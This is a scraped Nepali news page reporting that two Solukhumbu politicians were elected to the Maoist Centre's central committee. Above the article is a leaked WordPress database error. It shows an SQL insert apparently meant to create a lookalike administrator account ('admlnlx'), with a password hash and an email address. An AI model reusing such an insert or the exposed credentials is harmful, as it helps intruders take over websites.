WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BGC7feiv8wtncJ82MW7KNINevYz8oj0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 19:42:26', '', 'admlnlx', 'admlnlx')

नेकपा माओवादी केन्द्रको केन्द्रीय सदस्यमा सोलुबाट राई र बस्नेत निर्वाचित – Gaule Khabar

नेकपा माओवादी केन्द्रको केन्द्रीय सदस्यमा सोलुबाट राई र बस्नेत निर्वाचित

नेकपा माओवादी केन्द्रको केन्द्रीय सदस्यमा सोलुबाट राई र बस्नेत निर्वाचित

काठमाडौं । नेकपा माओवादी केन्द्रको आठौं महाधिवेशनबाट सोलुुखुम्बु जिल्लाबाट हेम कुमार राई “सूरवीर” र शिब बहादुर बस्नेत “राजेन्द्र” केन्द्रीय सदस्य निर्वाचित भएका छन् ।

आइतबार महाधिवेशनको बन्दसत्र सञ्चालन भइरहेको कमलादीस्थित नेपाल प्रज्ञा प्रतिष्ठानको सभाहलमा अध्यक्ष पुष्पकमल दाहाल प्रचण्डले उक्त नाम घोषणा गरेका हुन् ।

हेम कुमार राई “सूवीर” जनजाती युवा र शिब बहादुर बस्नेत “राजेन्द्र” खुलाबाट केन्द्रीय सदस्यमा निवार्चित भएका हुन् ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका